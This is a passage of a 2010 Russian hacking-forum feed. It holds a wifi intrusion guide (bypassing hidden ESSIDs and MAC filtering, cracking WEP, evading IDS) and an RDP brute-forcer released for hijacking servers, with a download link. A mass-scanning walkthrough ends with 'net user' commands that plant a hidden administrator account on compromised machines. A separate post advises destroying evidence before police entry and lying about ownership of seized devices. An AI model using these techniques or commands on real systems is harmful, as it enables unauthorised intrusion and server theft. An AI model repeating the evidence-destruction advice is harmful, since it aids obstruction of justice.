						&lt;p&gt;Итак, какими полезными умениями обладает эта прога. Во-первых, она выводит информацию о том, что точка доступа имеет конфигурацию «по умолчанию», вылавливает пробные запросы «затерявшихся» хостов, а так же пробные запросы Нетстамблера, может на лету расшифровывать пакеты, если задать правильный WEP, а в случае обнаружения IP-адресов, определяет, какой протокол применяется для их распознания (ARP, TCP, UDP или DHCP). Во-вторых, она генерирует дампы в формате pcap, что позволяет просматривать их затем с помощью анализатора сетевых протоколов Ethernal.&lt;/p&gt;
						&lt;p&gt;Существует еще множество программ, умеющих обнаруживать беспроводные сети стандарта 802.11, среди них я бы выделил такие инструменты как Airfart, консольная тулза WifiScanner тоже, на мой взгляд, весьма неплоха. Они обе работают только на картах с набором микросхем Prism и нуждаются в дровах linux-wlan-ng.&lt;/p&gt;
						&lt;p&gt;/* Обходим барьеры */&lt;/p&gt;
						&lt;p&gt;Простейшая защита сети wifi от незаконного вторжения может осуществляться с помощью таких методов как: скрытие ESSID сети от посторонних глаз, фильтрация MAC-адресов и фильтрация протоколов. Давай посмотрим, что мы можем противопоставить этому.&lt;/p&gt;
						&lt;p&gt;Если сеть закрытая, то ее ESSID (Extended Service Set ID – служебный идентификатор сети) не фигурирует в циркулирующих в ней фреймах. Не зная ESSID сети, взломщик не может присоединиться к ней. На самом деле ESSID присутствует в запросах на повторную аутентификацию и повторное присоединение, а значит можно узнать ESSID, послав поддельный фрейм деаутентификации хосту от MAC-адреса точки доступа. Затем нужно перехватить фрейм посылаемый хостом, содержащий интересующий нас ESSID. Реализовать это легко можно с помощью утилиты essid_jack содержащейся в комплекте программ AirJack. В своей статье о DoS-атаках в сетях WiFi я уже писал об AirJack’е, поэтому не буду заострять здесь на нем внимания.&lt;/p&gt;
						&lt;p&gt;Возможен такой вариант событий, когда точка доступа одна и нет в настоящий момент взаимодействующих с ней хостов. В этом случае остается опробовать вариант ESSID характерный для настроек «по умолчанию» производителя данной точки доступа. Некоторые админы, закрыв сеть, даже не подумывают изменить их значения.&lt;/p&gt;
						&lt;p&gt;Фильтрация MAC-адресов вообще обходится проще простого. Нужно изучить трафик на предмет встречающихся MAC-адресов, и когда какой-нибудь хост отсоединится от сети, можно присоединится к ней, установив себе такой же MAC. Если ждать отсоединения хоста не хочется, то можно выкинуть этот хост из сети задосив его ; ) (но тогда появляется риск быть засеченным системой IDS).&lt;/p&gt;
						&lt;p&gt;Фильтрация протоколов применяется намного реже, чем фильтрация MAC-адресов и скрытие ESSID, так как это не всегда удобно для работы в сети и не во всех точках доступа можно нормально использовать ее. Если ты столкнулся с такой сетью, то могу тебе посоветовать испытать на предмет наличия уязвимостей разрешенные в сети протоколы. Обычно такими протоколами являются SSH и HTTPS. Если используются устаревшие версии протоколов, то наверняка в них есть дыры, которые можно проэксплуатировать. Кроме того, весьма полезной может оказаться техника атак «Man-in-the-Middle».&lt;/p&gt;
						&lt;p&gt;/* Уделаем WEP */&lt;br /&gt;Про взлом протокола WEP написано уже столько, что создается ощущение, что это чуть ли не единственная и самая главная защита беспроводных сетей от вторжений, и что на этом ограничиваются средства безопасности сетей wifi. Что ж, судя по статистике это верно в каждом третьем случае.&lt;/p&gt;
						&lt;p&gt;Выделяют несколько видов атак на WEP:&lt;br /&gt;- атака методом полного перебора – возможен подбор только 40-битного ключа (в WEP применяются 64-х и 128-ми 256-ти 512-битные ключи, но так как первые 24 бита занимает так называемый вектор инициализации (IV), передающийся в открытом виде, то можно говорить, что длина ключей составляет 40 и 104 и т.д. бита), но такая атака может занять довольно продолжительное время, а потому неэффективна;&lt;br /&gt;- атака по словарю – может осуществляться против одного перехваченного пакета, она реализована в проге Wepattack; в отличие от атаки методом полного перебора, возможна расшифровка 104-битного ключа;&lt;br /&gt;- атаки методом полного перебора с использованием оптимизирующих алгоритмов – могут сократить время полного перебора 40-битного ключа с нескольких недель до половины минуты, но это при удачном для хакера раскладе, а в целом эти атаки так же неэффективны (64-битное шифрование встречается очень редко);&lt;br /&gt;- атака FMS – имеет очень интересный механизм, позволяющий при наличии 6-8 млн. пакетов определить значение WEP;&lt;br /&gt;- оптимизированные атаки FMS – например, хакер H1kari сумел оптимизировать алгоритм FMS так, что количество необходимых пакетов сократилось до 500 тысяч;&lt;br /&gt;- другие атаки – сюда можно включить различные вспомогательные атаки, например, внедрение трафика для ускорения процесса сбора необходимого количества пакетов.&lt;br /&gt;В реальности количество необходимых для взлома WEP перехваченных фреймах может колебаться в весьма широких пределах, но обычно это 1,5-2 млн. пакетов.&lt;/p&gt;
						&lt;p&gt;На сегодняшний день проги, взламывающие WEP используют, в основном, так называемую атаку по методу Флуера-Мантина-Шамира или атаку FMS, разработанную в 2001 году Скоттом Флуером (Scott Fluhrer), Ициком Мантином (Itsik Mantin) и Ади Шамиром (Adi Shamir), плюс различные оптимизирующие эту атаку алгоритмы. Одной из лучших программ для взлома WEP является на сегодня Aircrack. Помимо атаки FMS, она использует также несколько новых видов атак, разработанных хакером KoreK. Для взлома WEP нужно скормить Aircrack’у файл с перехваченными пакетами в формате pcap.&lt;/p&gt;
						&lt;p&gt;В сетях с низким трафиком процесс сбора пакетов может весьма затянуться. В документации к Aircrack’у подробно описан способ решения этой проблемы с помощью дополнительной карты, посылающей уже перехваченные фреймы снова «в эфир», предварительно вставляя в них ARP-запросы (хитро задумано, не правда ли?), что позволит получить дополнительный трафик в виде ответов на них. На мой взгляд, это не совсем удобный вариант из-за того, что не у всех есть две карточки wifi. Альтернативой может послужить использование проги File2Air, умеющей посылать данные в режиме мониторинга.&lt;/p&gt;
						&lt;p&gt;В принципе, есть еще один способ узнать WEP: если сеть подключена к Интернету, то, проникнув через него на одну из машин, можно попытаться определить WEP-ключ сетевого интерфейса wifi. К примеру, в Linux-системе он хранится в файле /etc/pcmcia/wireless.opts.&lt;/p&gt;
						&lt;p&gt;/* Что дальше? */&lt;/p&gt;
						&lt;p&gt;А дальше обычно ничего. Защитный потенциал большинства беспроводных сетей на этом и заканчивается. Но бывает, что нет. Сеть может функционировать на базе стандарта 802.1x, может быть развернута виртуальная частная сеть (VPN). Здесь успех проникновения будет зависеть от множества различных факторов. Универсального алгоритма дальнейших действий попросту нет.&lt;/p&gt;
						&lt;p&gt;В системе аутентификации протокола 802.1x могут использоваться различные реализации протокола EAP: EAP-TLS, EAP-TTLS, EAP-PEAP, EAP-LEAP, EAP-MD5. На счет двух последних могу сказать, что они обладают уязвимостями. Существуют софтины leapcrack, Asleap-imp для атаки против EAP-LEAP. EAP-MD5 уязвим к атаке «Man-in-the-Middle». Атакующий может внедрить фальшивую точку доступа между хостом и RADIUS-сервером, перехватив весь передаваемый трафик, в том числе имя и пароль.&lt;/p&gt;
						&lt;p&gt;Техника проникновения в VPN развернутую на базе беспроводной сети аналогична той, что может применяться в проводных сетях. Большинство VPN туннелируют трафик с помощью протоколов PPTP (Point-to-Point Tunneling Protocol) или IPSec. Для PPTP существует сплойт deceit.c от Aleph One. Протестировать на безопасность IPSec поможет тулза Ike-scan.&lt;/p&gt;
						&lt;p&gt;/* Системы IDS */&lt;/p&gt;
						&lt;p&gt;На всем протяжении взлома ты должен не забывать о возможном наличии системы обнаружения вторжений, следящей за функционированием сети и выявляющей различные аномалии в ней, т.е. тебя. Чтобы проникнуть в сеть незаметно, тебе пригодятся некоторые знания о принципах функционирования этих систем. IDS может быть сигнатурной, на основе базы знаний и смешанного типа. Сигнатурные IDS включают в себя базу данных о различных событиях, характерных для определенных атак. Системы на основе базы знаний ведут статистику работы сети при нормальных условиях ее функционирования и сигнализируют о различных отклонениях. Какие же действия взломщика могут вызвать тревогу IDS?&lt;/p&gt;
						&lt;p&gt;Во-первых, это активное сканирование. Поэтому используй только пассивное сканирование. Во-вторых, посылка фреймов с подозрительным ESSID. К числу подозрительных обычно причисляются: пустые, широковещательные ESSID, внесенные в блэк-лист и т.д. (кстати, в этом листе обычно содержаться ESSID, применяемые различными хакерскими прогами, поэтому перед их применением иногда нужно слегка подправить исходники). В-третьих, неправильно подделанный MAC-адрес (дело в том, что MAC-адрес зависит от производителя и от конкретной модели беспроводного оборудования, а IDS очень не нравится, когда попадается оборудование «неизвестного» производителя). Посмотреть диапазоны адресов различного беспроводного оборудования можно в файлах conf/ap_manuf и conf/client_manuf в каталоге, содержащем Kismet.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Mon, 04 Jan 2010 23:17:07 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=11#p11</guid>
		</item>
		<item>
			<title>RDP Brute - многопоточный брут дедиков</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=10#p10</link>
			<description>&lt;p&gt;Предоставляю вашему вниманию тестовую версию RDP брута, основанного на всем известном tss бруте.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;Просьба сильно не пинать, версия тестовая!&lt;/span&gt;&lt;br /&gt; &lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://xmages.net/upload/a0149053.png&quot; alt=&quot;http://xmages.net/upload/a0149053.png&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: green&quot;&gt;Вкратце что есть в бруте:&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;- Выбор типа сканирования IP: по одному указанному диапазону, либо сразу по списку диапазонов.&lt;br /&gt;- Опция потоков для сканера, возможность смены порта для скана&lt;br /&gt;- Настройки потоков для брута(сколько IP будет проверятся на отдельном потоке)&lt;br /&gt;- Опция выбора логина для брута (можете указать любой вместо стандартного administrator)&lt;br /&gt;- Редактирование списка паролей непосредственно из программы&lt;br /&gt;- Вывод сбрученных дедов в отдельном окне после финиша брута&lt;br /&gt;- Русская справка по нажатию на кнопочке RUS Help&lt;/p&gt;
						&lt;p&gt;Пока все. Ошибок много пока, но брут рабочий. За время тестов было снята порядка 5ти дедов. Главное - не переборщить с колличеством списка IP. Лучше меньше да лучше =)&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;strong&gt;Правила работы!!!&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;1) ГЛАВНОЕ!!! Кидаем папку с брутом в корень диска. Любого. Следим шобы не было никакого намека на русские буквы, символы и пробелы в пути к бруту!&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;2) Далее - запускаем софтину собственно. Видим окошко. Вот я хз - но помоему там все ясно. Кому не ясно - тыкаем на кнопку RUS help, берем лупу, ручку и тетрадь и переписывает от туда все что написано!!!&lt;br /&gt; &lt;span style=&quot;color: green&quot;&gt;3) Поэтапные действия:&lt;/span&gt;1) Выбираем метод скана (по одному диапазону или по списку) 2) Заполняем поля для диапазонов. Если выбран&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;метод по списку&lt;/span&gt;, то удостовертесь что в вашем списке&lt;span style=&quot;color: red&quot;&gt;диапазоны выглядят так и никак иначе!!!&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 7.5em&quot;&gt;&lt;pre&gt;127.0.0.1-127.0.100.255
127.0.0.1-127.0.200.255
127.0.0.1-127.0.300.255&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;Тоесть без всяких пробелов!!!&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&lt;em class=&quot;bbuline&quot;&gt;Ненужно указывать лошадиные диапазоны! Лучше используйте небольшие... типа 127.0.0.1-127.0.255.255 максимум. Иначе сканиться будет долго да и сам брут подвиснет. Лучше наделать маленьких диапазонов и сканить их методом списка диапазонов!&lt;/em&gt;&lt;/p&gt;
						&lt;p&gt;После того как с диапазонами покончили - жмите скан. Откроется окошко скана и начнется поиск открытых портов на указанных вами диапазонах.&lt;span style=&quot;color: red&quot;&gt;Запоминайте колличество найденых IP. Оно вам пригодится&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Скан завершится когда окно пропадет. Теперь осталось разобраться с потоками! Допустим насканилось 100 IP. Теперь смотрим сколько нам нужно потоков(исходим из мощностей машины, канала инета и т.п.). Допустим нам&lt;span style=&quot;color: red&quot;&gt;нужно 5 потоков&lt;/span&gt;, делим 100 IP на 5, получаем 20.. Тоесть 20 IP на каждый поток. Вписывем цифру 20 в поле IP&#039;s on thread.&lt;/p&gt;
						&lt;p&gt;Ну и последнее - это настройки логина и пароля. По умолчанию стоит стандарт - administrator, но вы можете его заменить на любой другой, вписав свой вариант в соответствующее поле. &lt;/p&gt;
						&lt;p&gt;По нажатию на кнопке pass - появится окно редактирования паролей - там можно добавить или удалить пароли соответственно.&lt;/p&gt;
						&lt;p&gt;Все - теперь все готово - жмем кнопку Start Brute - откроются окошки брутера и начнется перебор.&lt;/p&gt;
						&lt;p&gt;Брут закончится когда пропадут все окошки. Теперь можно нажать на кнопку GetGood и в появившемся окошке скопировать сбрученные деды(если они есть).&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;Далее шаг последний - нажать на кнопку CleanUP&lt;/span&gt;- это нужно для удаления мусора после работы брута. Если кнопку эту не жать, то папка work превратится в хлам и возможны появления ошибок.!&lt;/p&gt;
						&lt;p&gt;Все!&lt;/p&gt;
						&lt;p&gt;Автор - Dizz&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.proxy-base.org/proxytools/brute.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;br /&gt;Пасс:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.proxy-base.org&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://grabberz.com/showthread.php?t=18662&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Такая же тема на гребберзе&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://forum.zloy.org/showthread.php?t=80956&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;такая же тема на взлом&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Mon, 04 Jan 2010 22:04:35 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=10#p10</guid>
		</item>
		<item>
			<title>Добудем дедик</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=9#p9</link>
			<description>&lt;p&gt;и так приступим .....&lt;br /&gt;Мы будем искать деды на открытые порты 139,135 - null session и 5900 - VNC.&lt;/p&gt;
						&lt;p&gt;Можно использовать множество сканеров но я предпочитаю angry ip scanner качаем его&lt;a href=&quot;http://rapidshare.com/files/110219861/ipscan.exe.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Качаем&lt;/a&gt;&lt;br /&gt;чтобы было удобно юзать данный сканер создаём баник *.bat файлег с диапазонами в виде&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;ipscan.exe 192.168.0.1 192.168.2.2 192.168.0.1_192.168.2.2.txt&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;отсюда видно что запускается наш сканер ipscan.exe сканирует диапазон от 192.168.0.1 до 192.168.2.2 и сохраняет результат в 192.168.0.1_192.168.2.2.txt&lt;br /&gt;Чтобы не мучатся с вбивом диапазонов так как их может быть 400-500 а то и более был написан парсер для этого качаем парсер&lt;br /&gt;&lt;a href=&quot;http://rapidshare.com/files/110220057/Parser.exe.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Parser&lt;/a&gt;&lt;br /&gt;закидываем в парсер диапазоны в виде 192.168.0.1 192.168.2.2 он нам выдаст их в виде ipscan.exe 192.168.0.1 192.168.2.2 192.168.0.1_192.168.2.2.txt&lt;br /&gt;диапазоны по странам можно смотреть тут &lt;a href=&quot;http://www.proxyserverprivacy.com/ipaddress_range.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;ip rang&lt;/a&gt;&lt;br /&gt;теперь настраиваем наш сканер на скан портов 139,135,5900 и запускаем наш сканер и идем пить кофе ну или лучше поспать &lt;br /&gt;после скана одного диапазона создастся файлег в папке с сканером под названием ip от-до.txt(192.168.0.1_192.168.2.2.txt) если вы будете сканить 500 диапазонов то в папке со сканером будет 500 файликов&lt;br /&gt;Для удобства парсинга результатов angry был написан еще 1 парсер качаем его&lt;a href=&quot;http://rapidshare.com/files/110220183/Parser2.exe.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Parser2&lt;/a&gt;&lt;br /&gt;закидываем в него все результаты от скана он нам разделит ипы на 3 столбца 139 135 5900&lt;br /&gt;И так для брута дедов с открытой null session(139,135) я использую NTscan качаем его&lt;a href=&quot;http://rapidshare.com/files/110220290/ntscan10.rar.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;NTscan&lt;/a&gt;&lt;br /&gt;думаю все разберутся как его юзать.&lt;br /&gt;а так же для массавого чека VNC (5900) дедов используем VNCmasss качаем его &lt;a href=&quot;http://rapidshare.com/files/110220519/vncmass.rar.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;VNCmass&lt;/a&gt;&lt;br /&gt;VNCmasss позволит приконектится к бажному VNC деду без авторизации .&lt;/p&gt;
						&lt;p&gt;Когда NTscan сбрутит деда то пробуем к нему подключиться через RDP если не подключается то значит на деде закрыт порт 3389 про такой дед лучше забыть,а если открыт данный порт на дедике и мы зашли на дед то быстренько создаем учетку&lt;br /&gt;cmd&lt;br /&gt;net user user pass /add &lt;br /&gt;net localgroup Administrators user /add &lt;br /&gt;net localgroup &amp;quot;Remote Desktop Users&amp;quot; user /add&lt;br /&gt;net accounts /maxpwage:unlimited &lt;br /&gt;exit&lt;br /&gt;заходм под свеже созданной учеткой и наслаждаемся добытым Дедиком&lt;/p&gt;
						&lt;p&gt;в случае если вы вошли на дед через бажный VNC то так же проверяем открыт ли порт 3389 если порт открыт по такому же примеру приведенному выше создаём учетку&lt;br /&gt;Если RDP закрыт то на такой дед можно забить.Бажные Vnc Восновном на XP и толку от таких дедов мало.&lt;/p&gt;
						&lt;p&gt;Удачного всем брута и скана &lt;br /&gt;Спасибо за внимание .&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Mon, 04 Jan 2010 21:38:06 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=9#p9</guid>
		</item>
		<item>
			<title>Что делать, если вас поймали компетентные органы?!</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=8#p8</link>
			<description>&lt;p&gt;Пособие по защите своей свободы или каких сюрпризов стоит ожидать.&lt;/p&gt;
						&lt;p&gt;Данная статья расскажет о том, с чем можно столкнуться, если к вам нагрянут сотрудники отдела «К» или ФСБ. Будьте уверены, если они пришли, значит на вас уже что-то есть, иначе бы они и не пошевелились.&lt;/p&gt;
						&lt;p&gt;На пороге…&lt;br /&gt;Представьте такую ситуацию - на пороге вашего дома стоят компетентные органы (далее агенты). Обычно в гости они приходят рано утром, с целью застать всех дома. Приблизительное время 6-7 утра. В этот момент, у них уже вероятно есть постановление суда на обыск и заведено уголовное дело, в котором вы проходите пока еще только свидетелем. Допустим, вы знаете наверняка, что за дверью не ваша любимая подруга с бутылочкой холодного пива для вас, тогда первое чем следует заняться, это заметать следы и никак не реагировать на их звонки. Однако времени у вас довольно мало. Если агентам известно наверняка, что вы дома - долго они ждать не будут, в случае чего просто вышибут дверь (приедет наряд). Но это в крайнем случае. Поэтому, необходимо 7 раз подумать, что за информация хранится на вашем харде, возможно следует заранее записывать ее на другой носитель, который легко уничтожить. А убрать информацию с компьютера начисто поможет метод гутмана. При этом лучше все свои девайсы хранить под рукой, прятать смысла нет – все найдут, уж поверьте. Если подвернется удачный момент, даже на глазах у агентов не стесняйтесь ломать диски и топтать флэшки.&lt;br /&gt;Вы защищаете свою свободу!&lt;/p&gt;
						&lt;p&gt;Проникли внутрь…&lt;br /&gt;Итак, либо вам повезло, и вы успели все или часть уничтожить, либо пеняйте на себя. В любом случае, к вам в дом проникли агенты. Они предъявляют удостоверения и зачитывают вам постановление на обыск если у них такой имеется (скорее всего это так). Затем требуют отключить все телефоны и показать месторасположение компьютера или отойти от него. Дальше они начнут расхаживать по вашей квартире как у себя дома и задавать вопросы. Первое что они спросят: “Есть ли в доме оружие или наркотические вещества?”. Если ни того, ни другого у вас нет, можете облегченно вздохнуть. Если есть - вам масштабно не повезло. На всякий случай у них имеется фото-камера, чтобы зафиксировать к примеру ваш рабочий стол. Место где стоит компьютер. А так же нарисуют схему квартиры, укажут где какие розетки и так далее. Запишут какие процессы запущены (если компьютер был включенным), какие программы работали.&lt;/p&gt;
						&lt;p&gt;Так как теперь вам нечем заняться, можете наблюдать, как в вашем доме все переворачивают. Процедура обыска проходит в присутствии понятых. Понятыми могут быть, например студенты, проходящие практику в тех же органах власти . якобы они не имеют никакого отношения к конечному результату дела. Далее на ваших глаза изымают ваш же системник, модем, еще и принтер могут прихватить, а так же любые предметы, которые могут быть использованы против вас в суде. В первую очередь это: диски, флэшки, записные книжки, листы бумаги (достанут даже из урны), журналы, ваш фотоальбом. Они имеют право изъять все, что посчитают нужным. &lt;/p&gt;
						&lt;p&gt;Далее будет составлен протокол обыска, т.е. список изъятого. Отмечу, что процесс этот очень долгий и у вас есть время обдумать ситуацию. Но пока вы думаете, не забывайте думать об этом молча. И не отвечать ни на какие вопросы следователей. ответите как придет адвокат, если сочтете нужным. На протоколе вы должны будете поставить подпись. Все кто присутствовал в этот момент в квартире в будущем могут быть использованы в качестве свидетелей и быть допрошены на факт того, что вы за человек такой. По-этому не стоит надеется, что показания вашего брата или например отца не смогут повлиять на исход дела. Смогут! Еще как смогут! Спросят у них..., а потом окажется что вы опытный пользователь и более того... Рекомендую на протоколе обыска и всех прочих бумагах где вам велят поставить подпись, не ставить свою обычную подпись и по возможности вообще отказаться от данной процедуры. В дальнейшем ваши каракули могут использовать в различных нехороших целях! Например, вашему возможному напарнику предъявят ложный документ, в котором вы его полностью палите с вашей же подписью, которую он за 10 лет видел много раз. Думаю с этим все ясно. Так что сразу задумайтесь к кому еще могли прийти. Неплохо было бы заранее обговаривать подобную ситуацию, но всего не учтешь, как бы этого не хотелось. &lt;/p&gt;
						&lt;p&gt;После составления протокола, агенты просят вас проехать с ними. Отказаться вы не можете.&lt;/p&gt;
						&lt;p&gt;Давление&lt;br /&gt;И вот, вы сидите в кабинете следователя. Сейчас начнется давление и будет это не как в кино. Бить вас не станут, но психологическими атаками по мозгу надают, то по одному, то группой сотрудников. В том числе ожидайте различных игр вроде – «добрый полицейский, злой полицейский». Вас заверят, что уже все знают, и вы напрасно тянете время. Попытаются зацепить ваше самолюбие, рассказывая какой вы крутой хакер и что вы превосходно кого-то взломали, да еще и искали они вас очень долго. Все что они говорят, можно смело пропустить мимо ушей. Запомните простую вещь, не верьте ни одному слову, сказанному агентами, и сами ничего не говорите. Если уж надумаете что-то говорить, то говорите коротко – «да» или «нет», не нужно давать развернутых ответов. &lt;br /&gt;На все ваши ответы или же вопросы заданные ими будут отслеживаться жесты, мимика, в общем ваша обратная реакция. Этому их тоже учат. Так же как учат этому в различных центрах по НЛП. Если надумаете врать что-то, то это весьма рискованный шаг. И без хорошей подготовке, вы только затяните петлю у себя на шее.&lt;/p&gt;
						&lt;p&gt;Спустя N-ое количество времени и попыток выбить из вас признание и любую другую информацию, агенты, наконец, зачитают вам ваши права. Только с этого момента начинают работать юридические законы. Теперь вы законно включаете свой мобильный и набираете номер адвоката. У вас еще нет знакомого адвоката? Поспешите обзавестись, ОЧЕНЬ пригодится. &lt;/p&gt;
						&lt;p&gt;Фух…приходит адвокат, и вы уже чувствуете, что практически на свободе. Но знайте, что каждый человек (есть у него адвокат или нет), имеет право отказаться от дачи показаний по статье 51 УК РФ. Можете следователю так сразу и сказать, как только он зачитал вам ваши права. Вот что нужно сказать: “Я отказываюсь от дачи показаний согласно статье 51 УК РФ”. И все. Что может быть проще? После этого вас должны временно отпустить. Но если у вас есть адвокат, лучше конечно же дождаться его прихода!&lt;/p&gt;
						&lt;p&gt;Радоваться рано. Все только началось!&lt;br /&gt;Пока идет следствие (опрашивают ваших соседей, проверяют ваш компьютер, наводят справки о вас (школа, вуз, места где вы можете стоять на учете), как бы и так уже у них была о вас информация, но теперь она стала приобретать официальный характер и все записывается в ваше уголовное дело, где вы с момента как вам зачитали права становитесь обвиняемым.&lt;br /&gt;Стоит задуматься, кого следует предупредить, что с вами случилась такая беда. И лучше вы сделаете это прежде, чем это сделают они. Ну а дальше, вы будете знакомиться с делом, писать жалобы, снова знакомиться, и в итоге дело передадут в суд по месту вашего проживания. Жалобы должны содержать минимум информации, но все четко по делу. Что изъятое вам не принадлежит, вы компьютером пользоваться не умеете и искренне просите остановить следствия против вас.&lt;/p&gt;
						&lt;p&gt;В итоге&lt;br /&gt;Подводя итоги, я хочу сказать следующее, писать можно очень много, но попробуем как-то структурировать все выше сказанное и по пунктам расписать, что же все таки лучше всего делать и не делать.&lt;/p&gt;
						&lt;p&gt;Не стоит:&lt;br /&gt;1. Ставить где бы то ни было свои подписи до того как вы побывали в их заведении и вам зачитали права. А если и ставить, то уж точно не свою.&lt;br /&gt;2. Подумать, к кому еще могли прийти, потому что если вас поймали как группу, то согласно статей (272-274), вас и судить будут как группу, что совсем не лучше, если бы вы были один. Так что, тот кто все палит вдвойне пострадает. Ни себе ни людям. Если вы думаете, что после обещаний того, что если вы все расскажите - вас отпустят, то можете про это забыть. В лучшем случае, просто смениться следователь и новый следователь скажет, что вообще ничего не знает, кто вам там что обещал...&lt;br /&gt;3. Общаться в кабинете куда тебя привезли. Этого то от тебя и ждут! Ничего им не говори, пока не пришел адвокат. Или пока не зачитали права. Как только зачитали, сразу отказывайтесь от дачи показаний.&lt;br /&gt;4. Важный момент, никогда не стоит полагаться на честность друзей, своих напарников, знакомых, и даже родственников. Под давлением компетентных органов могут случаться различные неприятные моменты. В этой “войне” ты и только ты себе можешь помочь. Не стоит даже так уж надеяться на адвоката. Они тоже люди и у них естественно существуют свои методы работы и взаимодействия с прокурорами, судьями и даже теми же органами власти. Эта их работа.&lt;br /&gt;5. Забирать какие-либо уже изъятые у тебя вещи. Они ведь не тебе принадлежат, так ведь?! Иначе это практически доказывает, тот факт, что диск с вирусами, который тебе отдали принадлежит именно тебе.&lt;/p&gt;
						&lt;p&gt;Что стоит предпринять:&lt;br /&gt;1. Сменить номер телефона. И зарегистрировать симку на друга. Ни в коем случае не звонить напарникам, если такие есть или кому бы то ни было кто имеет хоть какое-то отношение ко всему этому. Лучше уж лично со всеми с кем считаете нужным встретиться и обсудить. И вообще постараться в ближайшее время на время следствия забыть о появлении в сети. А то скажут потом, что и во время следствия не прекращал пакостить и так далее.&lt;/p&gt;
						&lt;p&gt;2. Нанять хорошего адвоката. Думаю, свобода дороже денег. Но лучше, если это будет проверенный адвокат, друг семьи или возможно родственник. Советую такого найти иначе вы лишь зря потратите деньги, время и нервы!&lt;/p&gt;
						&lt;p&gt;3. Помните, что все что происходит в кабинете, записывается на видео. (это чтобы все было честно и справедливо и вы не могли например дать взятку следователю или иному лицу который вас в чем то обвиняет). Как минимум записывается звук.&lt;/p&gt;
						&lt;p&gt;4. Если тебя вызывают, приходить только по повестке. Если вам звонят и просят подойти в такое-то время к ним, помните, что вы можете легко на это дело забить.&lt;/p&gt;
						&lt;p&gt;5. Учесть тот факт, что согласно закону, провайдеры (и не только они) с удовольствием предоставят правоохранительным органам все лог файлы и прочую необходиму информацию, за любой период.&lt;/p&gt;
						&lt;p&gt;Важно:&lt;br /&gt;Если даже с вашего компьютера и с вашего ip адреса следствием было доказано, что было нарушение закона, то это еще не говорит, о том, что именно вы это сделали, а не кто-то другой, например вредоносная программа или вирус, который к вам пробрался и сам там все натворил. Нужно не забыть, что если вы хотите, чтобы в конечном итоге, независимо от результатов вам вернули компьютер, модем и т.д., то нужно передать права собственности всего изъятого на своих родственников, или друзей, которые смогут это подтвердить. А именно твердить в деле, что все изъятое вам не принадлежит. И уж тем более не стоит надеется на лояльность агентов и их благосклонность к вам. Их работа – ограничить вашу свободу, что в большинстве случаев, так и бывает.&lt;/p&gt;
						&lt;p&gt;(с) goodgod&lt;br /&gt;Все мысли написаны опираясь на личный опыт. &lt;br /&gt;Ничего личного к сотрудникам и органам власти я не имею.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Mon, 04 Jan 2010 20:55:13 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=8#p8</guid>
		</item>
		<item>
			<title>Взлом компьютера! И получение полного контроля! (Xtotal) Видео</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=7#p7</link>
			<description>&lt;p&gt;[youtube]http://www.youtube.com/watch?v=jw2WYUDm0wE[/youtube]&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Mon, 04 Jan 2010 06:17:50 +0300</pubDate>
